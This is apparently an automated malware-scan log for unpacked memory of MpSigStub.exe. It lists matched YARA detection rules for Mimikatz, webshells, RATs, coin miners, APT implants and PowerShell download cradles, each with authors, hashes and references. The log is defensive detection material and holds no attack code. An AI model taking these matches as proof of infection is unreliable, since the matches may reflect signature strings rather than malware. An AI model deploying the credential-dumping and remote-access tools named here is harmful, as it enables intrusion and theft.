Source: 35.3.MpSigStub.exe.15b1bcea0d6.57.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1bcea0d6.51.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.15b1bcea0d6.51.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1b59d455.149.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59d455.149.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1aac7d52.155.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.15b1c05a7fa.78.unpack, type: UNPACKEDPE Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE Matched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1c2d858a.187.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1aac714e.153.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1a80e0b6.17.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1a80e0b6.17.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.15b1a80e0b6.17.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1bf7bf4d.37.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1b59e859.122.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59e859.122.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1ad1f44c.63.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1b785121.89.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a7cfabd.178.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59fe5d.121.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59fe5d.121.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1af1836e.68.unpack, type: UNPACKEDPE Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 35.3.MpSigStub.exe.15b1af1836e.68.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1bcea0d6.215.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.15b1bcea0d6.215.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1c05a7fa.93.unpack, type: UNPACKEDPE Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 35.3.MpSigStub.exe.15b1b41327e.91.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b2d20ac.231.raw.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1b2d20ac.231.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1abe8b36.144.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 35.3.MpSigStub.exe.15b1b59e859.108.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59e859.108.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b354b6e.95.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 35.3.MpSigStub.exe.15b1bf2fb91.170.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bf2fb91.55.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59fe5d.150.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59fe5d.150.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1aac654a.154.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1b785a75.90.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1a80f4ba.16.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1a80f4ba.16.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.15b1a80f4ba.16.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
